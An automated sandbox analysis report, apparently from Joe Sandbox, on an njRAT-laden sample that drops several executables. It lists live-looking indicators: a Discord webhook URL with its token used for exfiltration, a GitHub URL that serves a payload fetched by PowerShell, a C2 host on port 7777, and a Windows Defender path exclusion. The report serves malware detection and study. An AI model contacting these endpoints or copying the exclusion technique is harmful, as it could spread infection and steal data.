Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
140.82.113.3	github.com	United States	36459	GITHUBUS	false
162.159.129.233	discordapp.com	United States	13335	CLOUDFLARENETUS	false
46.121.250.34	gabh.gotdns.ch	Israel	9116	GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
github.com	140.82.113.3	true
api.ipify.org	172.67.74.152	true
discordapp.com	162.159.129.233	true
gabh.gotdns.ch	46.121.250.34	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9	false		high
https://api.ipify.org/	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: virus.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\ClickMe.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 11.2.final.exe.3758448.0.raw.unpack

Multi AV Scanner detection for dropped file

Source: C:\ClickMe.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\dllhost.exe	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: virus.exe.bin.exe	ReversingLabs: Detection: 66%
Source: virus.exe.bin.exe	Virustotal: Detection: 65%			Perma Link

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.6:49685 version: TLS 1.2

Source: virus.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 Corporation1)0' source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Daniel\source\repos\joinerStub\obj\Release\joinerStub.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Daniel\program.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		16_2_079BB248
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		16_2_079BB238

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.6:49691 -> 46.121.250.34:7777

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49691 -> 46.121.250.34:7777

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 80Expect: 100-continueConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 140.82.113.3 140.82.113.3
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49683 -> 172.67.74.152:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49685 -> 140.82.113.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: discordapp.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: gabh.gotdns.ch

Source: unknown

Source: global traffic

Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/U3
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorLastChi=
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decln
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-declna
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsme
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsNodeVal;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesling
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyy/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growthh
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespacesA
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdte:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsf-node7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refst3
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotationsce
Source: javaw.exe, 0000000C.00000002.3918752239.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2692372832.0000000014F95000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treeskN1
Source: javaw.exe, 0000000C.00000002.3918752239.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2692372832.0000000014F95000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamicrnal/im
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/xml/F
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkingum
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingor=
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvispa
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclnA
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueang/IllB
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingva/lanB
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefutil/SD
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefniti:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/w3c/d
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
